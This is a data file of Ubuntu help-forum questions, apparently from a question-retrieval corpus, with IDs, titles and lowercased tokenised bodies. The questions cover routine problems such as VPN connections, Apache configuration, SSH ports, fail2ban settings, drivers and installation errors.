264025	openvpn will not connect	i have created an openvpn connection to giganews ' vypervpn but it does n't connect . i followed all of their procedures found here : www.giganews.com in my /var/log/syslog i find this : mar 4 16:57:45 x123 networkmanager [ 1511 ] : < warn > connection /org/freedesktop/networkmanager/settings/0 failed to activate : ( 1 ) could not find source connection , or the source connection had no active device .
264031	sony vaio brightness [ radeon 7500m/7600m series ] in ubuntu 12.10	i bought a sony vaio with windows 7 preinstalled . now i have a lot of problem installing ubuntu , but i was able to install ubuntu , but now the brightness does n't work as needed . with lspci i get : vga compatible controller : advanced micro devices [ amd ] nee ati thames [ radeon 7500m/7600m series ] how can i solve this ? too much light is hurting my eyes , the brightness is at maximum level and i use the computer to work .
264032	how to build an operating system that is built on top of ubuntu	hey i 'd like to build my own operating system ( really just the ubuntu distro as i know the task is difficult ) but what i mean by this is i wish to build atop of the ubuntu operating system as like apple has done with os x building it atop of unix . i would like to do the same thing with a distribution of ubuntu linux except my business would be in control of everything , instead of canonical ltd . i 'd appreciate and respect your answers on is this possible and how or maybe links to how to go about doing it . this question is different from just an ubuntu live cd because i do n't want to create an almost entirely different os then ubuntu . in fact that is why i say that `` i 'd like to build my own operating system '' . thanks in advance !
264035	ubuntu server 12.04 - create a non-root user with own userdir	i 've created a new non-root user , dev , that so far does not belong to any groups , and i 've been following this guide to help me setup apache for hosting sites under this user 's public_html directory ( this is a development machine ) . as this new user does not belong to the sudoers group , i 'm now having the obvious problem of trying to create the following symbolic links when logged in as the new user ( under step2 in the linked article ) : sudo ln -s ../mods-available/userdir.conf userdir.conf sudo ln -s ../mods-available/userdir.load userdir.load also , if i browse to http : //192.168.1.100/dev i get a 404 not found response , when i should at least be seeing some sort of file/folder structure ( assuming i did everything correctly ) . what workaround is there to this ? better yet , what is the correct method of setting up the public_html folder for a non-root user . i 'm doing this in an effort to learn as well as ensure that a non-root user is being used to create any sites ... .am i being too paranoid about getting the security right ? many thanks
264037	how to use qt creator with python ?	i want to use qt for developing ubuntu desktop , phone and tablet applications but i do n't want to learn a new programming language ( c++ , javascript ) . is it possible to write qt application in python utilizing qt-creator as ide ?
264038	forbidden - you do n't have permission to access / on this server	if i do it this way : it works documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > drwxr-xr-x 2 root root 4096 nov 6 15:27 www but if i do this : does not work documentroot /home/diego/web_server < directory / > options followsymlinks allowoverride none < /directory > < directory /home/diego/web_server > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > drwxr-xr-x 2 root root 4096 mar 4 15:40 web_server i 'm doing wrong ?
264041	control of terminal	i am relatively new to ubuntu and especially to using terminal commands . i love the system and regret not having discovered it years ago . in playing around with it and tweaking my system ( ubuntu 13.04 ) i have somehow lost control of my terminal function . when i attempt to run a command in the terminal i get an error msg . : e : type 'âdeb ' is not known on line 1 in source list /etc/apt/sources.list.d/virtualbox.list e : the list of sources could not be read . is there any way for me to regain control of the terminal and/or stop the `` virtualbox error ? ''
264042	what is the default apache2 log format and where is defined such default ?	i review ( a fast reading ) apache module mod_log_config and ca n't figure out what is the apache2 default log format and where is defined it . any idea ? note that what is on /etc/apache2/conf.d/other-vhosts-access-log is not a default option but a global option .
264044	printing quota error mesage	i 'm attempting to set up print quotas for printers here at the office . however , it appears when the quota is reached , the print just fails silently , and the user does n't have any idea what 's happening . page quota 's set up by altering the pagelimit directive in /etc/cups/printers.conf it appears i 'm getting the message e [ 04/mar/2013:15:34:28 -0700 ] returning ipp client-error-not-possible for create-job ( ipp : //localhost:631/printers/hewlett-packard-hp-laserjet-4100-mfp ) from localhost in my log at /var/log/cups/error_log . i tried hacking something together via a command like tail -f /var/log/cups/error_log | grep 'client-error-not-possible for create-job ' | display=:0 notify-send -t 30000 -i 'notification-message-email ' 'printing quota reached for this printer' but that does n't seem to really work as it only displays the message once on the first error message . any thoughts or solutions ? it really seems like there should be a prebaked solution for this .
264045	how to enable higher cpu frequency on lubuntu 12.04 ?	i have a dell latitude d430 laptop and i am unable to get the cpu to scale up to it 's max 1200mhz . i have installed the indicator-cpufreq tool and also the cpufrequtils package . however , my cpu is stuck at 800mhz . running cpufreq-info gives some interesting information : segin @ darvos : /etc $ cpufreq-info cpufrequtils 007 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 1 cpus which need to have their frequency coordinated by software : 0 maximum transition latency : 10.0 us . hardware limits : 800 mhz - 1.20 ghz available frequency steps : 1.20 ghz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 800 mhz and 800 mhz . the governor `` userspace '' may decide which speed to use within this range . current cpu frequency is 800 mhz . cpufreq stats : 1.20 ghz:46.82 % , 800 mhz:53.18 % ( 647303 ) analyzing cpu 1 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 1 cpus which need to have their frequency coordinated by software : 1 maximum transition latency : 10.0 us . hardware limits : 800 mhz - 1.20 ghz available frequency steps : 1.20 ghz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 800 mhz and 800 mhz . the governor `` userspace '' may decide which speed to use within this range . current cpu frequency is 800 mhz . cpufreq stats : 1.20 ghz:46.44 % , 800 mhz:53.56 % ( 599777 ) now , if i attempt to set the cpu governor to another governor , the policy still specifies the same frequency range . attempting to specify a new maximum frequency with sudo cpufreq-set -- related -- max 1200mhz gives no error but has no effect . attempting sudo cpufreq-set -- related -- min 1200mhz -- max 1200mhz generates the 'error setting new values ' error message . removing -- related does not change the outcome of each attempt . how can i change the cpu scaling settings so that i can lock it to 1200mhz all day , every day ? this laptop has a battery used well beyond it 's lifespan , so it 's always connected to a charger , and a 90w one at that .
264046	how to ssh on a port other than 22	i have two computers behind the same router . let 's call them a and b . a can ssh to b in the following manner : ssh usr @ < internal ip of computer > b can ssh to a by doing the same , but the external ip must be used . i have forwarded port 22 of my router to the ip of computer a , so that all makes sense to me . however , i want to also forward port 26 to computer b , and ssh from outside the network by using the external ip for both , but specifying either port 22 or 26 , to effectively select which computer to use . i have tried allowing port 26 through output of iptables on a and input of b , but that did n't seem to work . i have also forwarded port 26 to the internal ip of b ( through the router ) , as i did with 22 for a . here 's what i get when i try to ssh from a to b using the external ip and port 26 : ssh : connect to host xx.xx.xxx.xx port 26 : connection refused . versions : a = openssh_5.9p1 debian-5ubuntu1 , openssl 1.0.1 14 mar 2012 b = openssh_6.0p1 debian-4 , openssl 1.0.1c 10 may 2012 a has 12.04 ubuntu , b is a raspberry pi with raspbian . edit : something that i forgot to put in : i did try switching the ssh config file ( i found it is /etc/ssh/ssh_config ) i uncommented ( deleted the # ) the line with port and changed 22 to 26 . it gave me the connection refused message still . ( i rebooted to no avail . )
264053	how to install c++ fastcgi development library ?	i ca n't seem to find anything on this . i know apt-get install , but i do n't know the name of the package for the standard c++ fastcgi development library . what is it ?
264056	fix gear icon in libreoffice 4 from ppa	i installed libreoffice 4 from the supply debs in their website , because it did n't have unity integration i decided to completely uninstall it . today i saw the ppa has libreoffice 4 with support for unity , so i installed it from the ppa . the problem i have is with the icons in the side-bar once the programs are launched , calc and writer but not the main libreoffice . i can see the icons in the dash , but not in the side bar , i only see a gear and there 's no context menu for them either , just the option to lock or quit , not even the name of the program . i followed this guide : http : //forum.openoffice.org/en/forum/viewtopic.php ? f=101 & t=48319 # p227823 it actually works , every time i open any of the applications , the icons are correctly displayed and also their context menu , but as soon as i delete the desktop icons , the gear is back again without context menu . i do n't want to have libreoffice icons on my desktop . i also tried just drag and drop from the dash to the side bar , but when i start calc or writer , a new gear icon appears instead of using the already displayed libreoffice icon . does anybody has any idea of what 's going on ?
264059	no desktop on new installation	i have just installed ubuntu on a laptop running xp pro and there are no desktop icons ... .in fact , there is no desktop at all . can anyone help ? i am a newb where linux is concerned and i have searched the net but find all the solutions too technical . i tried installing the cinnamon desktop but i can not get anything to work in a terminal as it keeps asking for a password .
264062	gnome-sound-applet mouse wheel function is broken	i 'm using gnome classic session in ubuntu 12.10 and am running the gnome-sound-applet in order to have a volume control in the systray ( tint2 ) . mouse wheel scrolling to change the volume does n't seem to be working properly . i move the mouse pointer over the icon and turn the scroll wheel . the volume changes 5 % then stops . i ca n't change the volume anymore with the scrollwheel until i move the mouse pointer away from the icon and then back . then i can change the volume another 5 % . then i must move the pointer away again and so on . same thing with the slider . if i bring the slider to view i can not change the volume more than 5 % at a time with the scrollwheel . i can drag the slider to any desired position , but why is scrollwheel function so wonky ?
264063	resize partitions | gparted | swapoff fail	i have installed ubuntu 12.04 alongside winxp on my laptop . i 'm trying to resize partitions ( shrink winxp - enlarge ubuntu ) running gparted from liveusb . i read that i have to swapoff the linux-swap in order to resize the ubuntu partition . however , when i try to swapoff i get the error : could not deactivate swap swapoff : /dev/sda6 : swapoff failed : can not allocate memory i do n't know how to proceed from here . ( note : linux newbie ) update : i somehow managed to swapoff linux-swap so there is now no partition with a lock icon . did n't do anything different , it just happenned . still , after shrinking my winxp partition , gparted wo n't let me drag the ubuntu partition to the left ( where the newly created unallocated part is ) to resize it : winxp partition | unallocated | ubuntu | linux-swap *note : i understand that by dragging the left handle and should the whole thing succeed , there will probably be a problem with the grub 2 boot screen . i have also come to understand that this can be easily fixed with some terminal commands via the liveusb . please correct me if i 'm wrong .
264067	problem with touchpad scroll	i 've installed virtually ubuntu 12.10 on my toshiba laptop with vmware 9.0 it works good , but my touchpad scrolling does n't work anymore my question is : where i can download a driver for my synaptic touchpad to run mouse scrolling ? or any other commands/solutions , i tried some of commands , but they did n't make any sense . thank you : )
264070	byobu - status fields not hiding when i/o becomes zero - bug , or as expected ?	i wanted to make use of byobu 's `` network '' and `` diskio '' status fields , but i 'm not sure if the following behaviour ( # 2 ) is normal , or buggy : when there is io , the network and disk status numbers fluctuate and report as expected . when the io stops , those numbers show the last set of numbers that were reported , indefinitely . i was under the impression that # 2 should have been `` when the io stops , and 3 seconds have elapsed , the network and diskio status numbers should disappear from the byobu status area '' -- since byobu 's manual states : network - instantaneous upload/download bandwidth in [ gmk ] bps over the last 3 seconds ; nothing is displayed if traffic is 0 ; can anyone shed some light on this mystery - is it working as it should , or is it a bug ?
264071	why ubuntu 12.04 stuck in the logo screen after install it ?	i want to ask what should happen after installing ubuntu and restart the system . this is because i installed ubuntu 12.04 lts from the livecd in my netbook alongside windows 7 . after that the installation process was completed it ask me to restart the system and once i restarted the system it comes and show me please remove installation media and close the tray ( if any ) then press enter i removed the disc from my optic drive and then i have unplugged it ( remember that i 've a netbook , so it 's a external device that is connected via usb ) and i pressed enter . well , have passed about 4 hours since then and it 's still stuck in the ubuntu logo with the loading bar under it . so , any thought ? netbook specs : https : //store.sony.com.ar/pdf/vpcm120al.pdf
264074	naming computer after install	i 'm having a hard time even searching for the topic . i 'm trying to install lubuntu on an old pc i have . what i would like to do is install the os , but leave the name and password empty . i 'm going to be giving this pc away , and i would like to have the recipient turn on the pc and have it ask them to create a name and a password . this is basically what windows does when you buy it new , right ? is there a way to make this happen in l/ubuntu ?
264075	will mir display server be able to launch x11 applications ?	i 've checked the wiki but xorg is not even mentioned there .
264085	how can i assign hotkey on nautilus option `` open file in text editor '' ?	im used to f4 in total commander , and now looking for how to set it in nautilus .
264088	configure wireless network 12.10 command line	okay , so i 've recently set up a server with ubuntu server 12.10 to run as a headless server . when i ran the os installer/setup it gave me an option to immediately connect to a wireless network ( this box has a wireless card ) , and so i connected to my home network . since then i 've turned the server on/off multiple times and it 's always automatically connected to the wireless network until yesterday . usually i would ssh into the server , but yesterday i could n't , so i hooked a keyboard and a monitor back up and learned that it was n't connected to the wireless network . yesterday and today i attempted countless efforts to reconnect to the network from the command line based on advice from threads i found on google , but have been unsuccessful . this is extremely frustrating : surely it should n't be this difficult ? i 'm tired of trying to edit my interfaces file . many of the threads i 've found seem to date back quite a while . can anyone please help out ?
264090	how can i remap control+m to enter ?	i 'd like to remap some key behaviors globally . for example : control + m - > enter control + [ - > esc is there any tool equivalent to keyremap4macbook ? or is it possible to remap by using xmodmap ? i 've tried autohotkey , but it did n't work well with guake . any suggestions would be appreciated .
264091	enable horizontal scrolling in ubuntu	there is no option in mouse & touchpad settings to enable horizontal scrolling in ubuntu 13.04+ ( raring/saucy/trusty ) ( gnome 3.8+ ) : no horizontal scrolling even by enabling two finger scroll or content sticks to fingers . how is it possible ?
264094	how to find the size of internal routing table efficiently ?	i need to know how we can find the size of the kernel routing table . i have knowledge that the routing table is stored in /proc/net/route i am presently using wc to count the number of characters in this routing file . but the problem is my routing table will contains thousands of entries and i need to be able to find the size of it very frequently . is the size of the routing file stored elsewhere ? how do i get to know the size of the file /proc/net/route efficiently ?
264095	will the ubuntu touch dev image wipe my bootloader , when installed with the phablet package ?	as title says : will the ubuntu touch dev image wipe my bootloader , when installed with the phablet package ? any ideas on how well this will work in htc desire ? -lathrisk
264097	how can i install my lexmark z25 printer ?	how or where i can get a driver for the lexmark z25- , to install on ubuntu 10.04.4 lts ? ?
264098	configure fail2ban with bash script	i 'm trying to configure the /etc/fail2ban/jail.local config with an bash script . i was thinking to use sed and regular expression to change the sections i need . sed -i `` s/^bantime = 600/bantime = $ 1/ '' /etc/fail2ban/jail.local sed -i `` s/^destemail = root @ localhost/destemail = $ 2/ '' /etc/fail2ban/jail.local sed -i `` s/^action = % ( action_ ) s/action = % ( action_mwl ) s/ '' /etc/fail2ban/jail.local as you can see for bantime , destemail and action i 'm able to do so . only if it matches the exactly . i could be that the bantime , or the destemail is changed , then the script wo n't work . what can i use to make after the = sign flexable . for example if bantime is not 600 but 700 it will also change using the bash script . also there is an section to configure ssh and sshd : [ ssh ] enabled = true port = ssh filter = sshd logpath = /var/log/auth.log maxretry = 6 [ dropbear ] enabled = false port = ssh filter = sshd logpath = /var/log/dropbear maxretry = 6 [ ssh-ddos ] enabled = false port = ssh filter = sshd-ddos logpath = /var/log/auth.log maxretry = 6 i also want to specify the port i use for ssh or enable sshd with sed and regular expression . but as you can see when i match on enabled i will change all jails or if i match on port i will change all ports in the config . this is not what i want . can anybody assist me with an way to configur fail2ban with an script and a flexible way ? many thanks , raoul
264100	what is the advantage of a signed kernel ?	i was looking through apt packages for quantal and i found one called linux-signed-image-generic , which only says that it 's `` signed with the ubuntu efi key . '' the kernel package that it currently depends on says pretty much the same thing . so if your hardware supports efi ( i think i 'm running the signed kernel now ) then what benefits does the signed kernel have ? is it just a security thing ?
264101	allocating more disk space to ubuntu	i used the windows installer to install ubuntu 12.04 on my pc . by default it was installed with 17 gigs of space . i have filled up this space and want more . is there any way to allocate more disk space to ubuntu ?
264103	how many cpu cores and ram on vmware player for photoshop ?	how much ram and cpu core should i allocate for my vmware player ( windows 7 x64 as guest os ) ? my system specs : ubuntu 12.10 x64 intel i7 @ 2.20 ghz ( 4 cores + hyper-threading ) 8gb ram 750 hdd intel hd 4000 graphics by the way , my main purpose for the virtual machine is for adobe photoshop .
264108	qbittorrent error libtorrent-rasterbar.so.6 on ubuntu 12.10	i recently installed qbittorrent from the ubuntu software center and when i try to run it i get the error : qbittorrent : error while loading shared libraries : libtorrent-rasterbar.so.6 : can not open shared object file : no such file or directory i 've tried sudo apt-get remove qbittorrent* sudo apt-get purge qbittorrent* sudo apt-get install qbittorrent but it did not help , i keep getting the same error . i should note that i upgraded from ubuntu 12.04 to 12.10 . what should i do ? cheers .
264110	how do i install ubuntu 12.10 on my new macbook pro retina ?	i have tried installing ubuntu 12.10 on my mbp retina , but it just will not work properly . i have tried a few different guides , but it seems that none of them have worked . i have tried setting the boot with nomodeset and got it to download to my computer , but the wireless did n't work even after installing the broadcom drivers using the thunderbolt to gigabit ethernet cord . please someone help me install ubuntu properly without any issues . thanks in advance.ps would 12.04 be better ?
264113	how many different modifier keys can we have on a keyboard ?	i 'm digging the chorded keyboard info and trying to understand to what extent is that possible on an average desktop with the standard keyboard . this question is purely about number of different modifiers and maybe their unique combinations regardless of their position . using two standard keyboards ... allowed . related : is there any application for key blocking testing ? making any key into a modifier key
264116	how to produce a msword like document on ubuntu 11.10 ?	i made a very important document using puppy 5.1 with abiword . next i was to copy it on another pc using ubuntu 11.10 . i opened it easily & worked on it with libreoffice writer . my document is ready & i must in few hours print it via pc not serving linux text editors = i must convert it into msword like format . please , young friends , help me explaining me old 63 years old man what should i do to finish my work ?
264117	ca n't access ubuntu after i installed windows	so what i did to dual boot was split a partion from my ubuntu section . and then i installed windows onto the one that was empty . and now i ca n't access ubuntu . when i startup there is no option on to enter ubuntu .
264119	how can i change the time zone of bandwidthd ?	is there any way to change the utc offset for the graphs generated by bandwidthd ?
264122	how to enable empathy incoming message notifications ?	i installed empathy in lubuntu . i want a notification to popup when a message is received . however , when i open edit - > preferences - > notifications , it does n't have an option , `` show incoming messages in the messaging menu '' as usual . what should i do to enable message notifications ?
264129	how to get rhythmbox to sync album cover art to android ?	i have rhythmbox syncing quite well with my android phone . it automatically transcodes from flac to m4a and keeps the correct directory structure and track file names . so far so good . however , the sync process is not copying over the album art . in each album directory i have a file called `` cover.jpg '' which rhythmbox uses quite well , but it does n't make the journey to my android sd card . on banshee , the album art is copied , but it has a vexing array of other bugs which keep me from using it as a workaround .
264130	any good foip ( t.38 ) clients for ubuntu ?	at our office we have an asterisk server with t.38 set up on it . right now we are using a fax machine with an ata and it works good , but were hoping to go paperless . does anyone know of any good foip clients available for ubuntu ? maybe even set up able as a printer so you can `` print to fax '' ?
264131	12.04 command line failure to fetch	basically i just installed ubuntu 12.04 lts on a basic desktop that i had laying around . and for the life on me i can not get it to connect to the internet . no matter what i do , it always gives me the `` failure to fetch '' then a url when i try to sudo apt-get update also , i see a lot of people talking about opening certain windows , and going into certain settings , but i have none of that . just a command line . as you can tell i am extremely new to this . i would really appreciate someone pointing me to somewhere i can learn about this . i do n't want someone to explain it to me , i would prefer if someone just walked me through where they go to solve their problems . i apologize if this is an improper post , but i would want to learn it myself ( teach a man to fish and all that ) . or if you know of any good walk through using command line , i would appreciate it . thank you very much ! !
264133	how to uninstall ubuntu	i want to un-install ubuntu , so i can reinstall windows 7 . i 'm in college and barely anything they use is compatible with the ubuntu linux os . please help !
264134	are there any upcoming changes that can help people who are bad with names ?	every time i 've tried to use unity , i get stuck with the problem of there not being any standard lists of programs—there’s no menu for things like “system tools” , there’s no way to find the terminal without typing “terminal” . and yes , i’m sure some of you are laughing because someone could n't remember the word “terminal” , but i just could n't remember at one point—i could remember “shell” or “bash” but i could n't remember “terminal” and was scratching my head ( eventually i found it with a web search ) . this of course applies to just about any program , and you have to admit , some programs are named very strange things that sometimes have nothing to do with what the program actually does . with unity , i can’t find and launch programs just using the mouse unless they’re already in the sidebar/dock/taskbar thingy , and it’s frustrating , being a person that’s really really bad with names . i know you can find lists of things using the software center , but that 's not for launching programs . why do you require people memorize the names of everything ? are there any plans on making the gui easier for people who are bad with names ?
264146	which is more stable ubuntu ?	which version of ubuntu .04 or .10 is stable ? i have heard that always the .10 versions are stable than .04 versions . is it true ? in home i am using 12.04 but in office i am uisng 12.10 version . i do n't find a huge difference in stability . please guide me .
264152	the unity 'home folder ' launcher quicklist has duplicates . how can i remove them and add new entries ?	i added places to my 'home folder ' quicklist in 11.10 , i believe following these instructions and ended up with duplicates once that feature became standard in 12.04 . i tried this solution , removing /usr/share/applications/nautilus-home.desktop and reinstalling nautilus , but that did n't work . i 've already upgraded to 12.10 , but have just ignored this problem since it came up . i 'd like to know how to remove those duplicate entries and i 'd also like to know how to add other directories to the quicklist , specifically one or two commonly accessed sub-directories of my documents folder . any help is greatly appreciated !
264155	ux21e wireless hopeless in ubuntu 12.10	i had windows 7 installed on my asus ux21e and wireless was working perfectly . after installing ubuntu 12.10 i now find the wireless is very poor by comparison and if i move more than 4 meters away from my router the wireless signal drops off completely . i know you will need more info . please tell me what i can post to be more specific .
264162	how to fix ubuntu installation error with wubi ?	i have installed ubuntu 12.04 inside windows installer in my system , partition e. i just cut ubuntu and paste into another location and after that , ubuntu is not working . whenever i try to install , it shows following error message : an error occurred : error executing command command=c : \windows\sysnative\bcdedit.exe/set { ccdaaf92-e976-11e1-a206-dde85cb781c2 } device partition=e : retval=1 stderr=an error has occured setting the element data . the request is not supported . stdout= for more information , please see the log file : c : /users\advent~1\appdata\local\temp\wubi-12.04-rev272.log
264163	how to make cursor change in different modes in vim ?	how can i make vim change cursor in different modes so that these conditions are satisfied : without using gconftool or such tools . i need this affect only one instance of vim , not the whole terminal . this must be working in gnome terminal and gvim . i have tried changing with sample in help gcr , but it only works for gvim , and not vim in gnome terminal . i have tested http : //vim.wikia.com/wiki/change_cursor_shape_in_different_modes , but it changed the cursor for the whole terminal . playing with gcr is preferred . edit : i know that gcr is only for gui mode , but i mean some kind of functionality like that inside of vim . may be with some kind of plugin ...
264164	how can i convert my system into a remote desktop server	we are a small team having limited resoueces but large projects and ideas . i use ubuntu 12.04 on my system . i want to make my system usable to others also . hence i want to convert it into a remote desktop server so that even while i am working on ubuntu they can use my system ( without effecting my work ) just by logging in . is it possible ? note i want to allow multiple user sessions at once thank you
264168	intel i386 82865g onboard graphics	i just installed ubuntu 12.04.2 on a gateway system . it has intel i386 82865g onboard graphics . i 've downloaded these drivers from the intel page , they have `` linux '' label , no specific version , the filename is `` 20030425-i386.tar.gz '' . being new to ubuntu and linux in general , i need help with how to install these drivers ... thanks !
264170	radeon hd 7870 drivers	i have 64-bit 12.10 ubuntu and i just put in a new sapphire 100354xtl radeon hd 7870 video card . was wondering where to get suitable drivers . fglrx is n't working . will the legacy drivers work with this version of the video card ?
264172	microsoft surface pro choices for ubuntu install . which is better ?	i am looking to install ubuntu on my surface pro . there are two option that others suggest . first is to install ubuntu as the sole os and use a restore disk every time i want to use windows . second is to use a virtual machine with hyper-v. what is the difference of the os type latency issues for the above options ? what would be the best option to achieve maximum speed of either os ? would a better option exist to achieve a relatively fast switch between os types without having to restore windows ( eg . could you partition or is secure boot an issue ? ) . ps . i should note that my intention is to use adobe cs master suite ( most of it ) , 365 word and excel under windows and obviously do n't want to install them every time . install space is plenty at 96gb free ( 128gb surface ) .
264174	issues installing ubuntu 12.04 on asus a46 cm	i never had success installing ubuntu 12.04_2 64bit on my asus a46 cm , can someone help me ? it 's always rebooting and never starts after selecting language option . i 'm downloading from ubuntu server 1,6 gb and 700mb also . asus a46cm spec : intel core i5 3317u 1.7 - turbo boost 2.6 ghz ram 4 gb vga nvidia 635m 2 gb . sonic master audio hdd 500 gb
264176	error while installing tiff-4.0.3	i get the following errors while installing tiff-4.0.3 : pranav @ pranav-inspiron-1545 : ~ $ cd dependency/ pranav @ pranav-inspiron-1545 : ~/dependency $ tar -xvf libtiff4-3.6.0-5.tar.bz2 usr/bin/cygtiff4.dll pranav @ pranav-inspiron-1545 : ~/dependency $ tar -xvf libtiff4-3.6.0-5-src.tar.bz2 libtiff is now configured for i686-pc-linux-gnu installation directory : /usr/local documentation directory : $ { prefix } /share/doc/tiff-4.0.3 c compiler : gcc -g -o2 -wall -w c++ compiler : g++ -g -o2 enable runtime linker paths : no enable linker symbol versioning : no support microsoft document imaging : yes use win32 io : no support for internal codecs : ccitt group 3 & 4 algorithms : yes macintosh packbits algorithm : yes lzw algorithm : yes thunderscan 4-bit rle algorithm : yes next 2-bit rle algorithm : yes logluv high dynamic range encoding : yes support for external codecs : zlib support : yes pixar log-format algorithm : yes jpeg support : yes old jpeg support : yes jpeg 8/12 bit dual mode : no iso jbig support : no lzma2 support : no c++ support : yes opengl support : no pranav @ pranav-inspiron-1545 : ~/dependency/tiff-4.0.3 $ make making all in port make [ 1 ] : entering directory `/home/pranav/dependency/tiff-4.0.3/port ' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/pranav/dependency/tiff-4.0.3/port ' making all in libtiff make [ 1 ] : entering directory `/home/pranav/dependency/tiff-4.0.3/libtiff ' make all-am make [ 2 ] : entering directory `/home/pranav/dependency/tiff-4.0.3/libtiff ' /bin/bash ../libtool -- tag=cc -- mode=compile gcc -dhave_config_h -i . -g -o2 -wall -w -mt tif_jpeg.lo -md -mp -mf .deps/tif_jpeg.tpo -c -o tif_jpeg.lo tif_jpeg.c libtool : compile : gcc -dhave_config_h -i . -g -o2 -wall -w -mt tif_jpeg.lo -md -mp -mf .deps/tif_jpeg.tpo -c tif_jpeg.c -fpic -dpic -o .libs/tif_jpeg.o in file included from /usr/local/include/jpeglib.h:27:0 , from tif_jpeg.c:88 : /usr/local/include/jmorecfg.h:263:16 : error : expected identifier before numeric constant **make [ 2 ] : *** [ tif_jpeg.lo ] error 1 ** **make [ 2 ] : leaving directory `/home/pranav/dependency/tiff-4.0.3/libtiff ' ** **make [ 1 ] : *** [ all ] error 2** make [ 1 ] : leaving directory `/home/pranav/dependency/tiff-4.0.3/libtiff ' **make : *** [ all-recursive ] error 1 ** how do i get rid of these errors ?
264186	what happened to php-5.4.11 from ondrej ppa ?	i am in 12.04 so i added ondrej 's ppa to get php 5.4 . so far so good but php-5.4.12 seems to be broken with our code and after a while of struggling i decided to downgrade to php-5.4.11 but apt-cache showpkg php5 says : provides : 5.4.12-1~precise+1 - 5.3.10-1ubuntu3.5 - 5.3.10-1ubuntu3 - apparently 5.4.11 is no longer kept in my system for some reason as i 'm sure at some point in time i updated to 5.4.11 and then after a while to 5.4.12 . the other strange thing is what happened to the 5.4.11 in the odrenj ppa ? ! sure he does n't just delete a package when a new one arrives ( ? )
264190	gnome-shell ugly icons	i have problem with running python and java apps on gnome-shell . when i launch it via the overview , it works nice . but if i try to launch it through the terminal , an ugly icon ( not defined by alacarte ) shows up : petr @ sova : ~ $ ps -ef | grep lightread petr 5021 3512 19 09:29 pts/0 00:00:01 /usr/bin/python /home/petr/scripts/bin/lightread petr 5040 4555 0 09:30 pts/1 00:00:00 grep -- color=auto lightread i tried including the /usr/bin/python in my menu entry , but that did n't help .
264193	12.10 : webcam stopped working after update	i 'm using ubuntu 12.10 64 bits , on a lenovo ideapad u410 . i 've been using the included webcam with skype and google hangout with no issues . at some point in time , i noticed on google hangouts some update made the cam stop working . when i run lsusb , this is the result : bus 003 device 002 : id 04f2 : b2e1 chicony electronics co. , ltd on /dev i see this : crw-rw -- -- + 1 root video 81 , 0 mar 5 00:52 video0 also this : ~ $ ls /dev/v4l/by-id/ total 0 lrwxrwxrwx 1 root root 12 mar 5 00:52 usb-vimicro_corp._lenovo_easycamera-video-index0 - > ../../video0 so , now i test something like vlc to `` open capture device '' . the webcam turns on , but there 's no image . same thing on skype , i test the video and the cam turns on , but no image . at some point , the camera disappears from lsusb and i ca n't see it there anymore . i tested ubuntu 12.10 from a live usb and the camera works perfectly from there , so it 's not a hardware issue , but a software issue . i even tried to run skype as a root user to test if this was a change in permissions issue , but it still does n't work . i have no clue as to how to debug this issue , or find whatever update or installation made it stop working .
264199	dual monitor setup with extended desktop	i am trying to setup a dual monitor settings in ubuntu which will extend the desktop over two monitors . that means single panel , single launcher over two monitors . actually i was going to setup two monitors as single large display monitor . i tried the normal display settings and it has options for mirroring and two separate screens , but this doesnot satisfy my need . can i use my two monitors as a single monitor ? i.e when window is maximized or changed to fullscreen mode i want it to span over both the monitors . i have nvidia graphics cards and i have used twinview mode and separate x screen modes but my need is not fulfilled my using those settings .
264200	not able to install eclipse from ubuntu software center	while i try to install eclipse from ubuntu software center , it prompts me that failed to download packages and check your internet connection . if i click on ok button , it gives me requires installation of untrusted packages and in the details option : ant ant-optional default-jdk default-jre default-jre-headless eclipse-jdt eclipse-pde eclipse-platform eclipse-platform-data eclipse-rcp fastjar gcj-4.6-base gcj-4.6-jre-lib jarwrapper junit junit4 libart-2.0-2 libasm3-java libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common libcommons- beanutils-java libcommons-codec-java libcommons-collections3-java libcommons- compress-java libcommons-digester-java libcommons-el-java libcommons- httpclient-java libcommons-logging-java libdb-java libdb-je-java libdb5.1-java libdb5.1-java-gcj libecj-java libequinox-osgi-java libgcj-bc libgcj-common libgcj12 libglade2-0 libgnome2-0 libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libhamcrest-java libicu4j-4.4-java libicu4j-java libjasper-java libjaxp1.3-java libjline-java libjsch-java libjtidy-java liblucene2-java libregexp-java libservlet2.4-java libslf4j-java libxerces2-java sat4j
264204	ipython qtconsole not launching , ubuntu 12.04	when i try launch ipython qtconsole from terminal , i get the following error : python : /build/buildd/sip4-4.13.2/siplib/siplib.c:7915 : sip_api_can_convert_to_type : assertion ` ( ( ( td ) - > td_flags & 0x0007 ) == 0x0000 ) || ( ( ( td ) - > td_flags & 0x0007 ) == 0x0002 ) ' failed . aborted ( core dumped ) my guess is the qt broken packages , but i do n't know which ones ! i could really use your opinions in solving this issue .
264205	how to move application specific folder out of home folder ?	in my /home/myuseri have many folder like .thunderbird , .mozilla , .skype , etc . and meaningful for human folders like downloads , documents , become lost among folder with configs , cache , etc . how to move this app-folders in specific folder ?
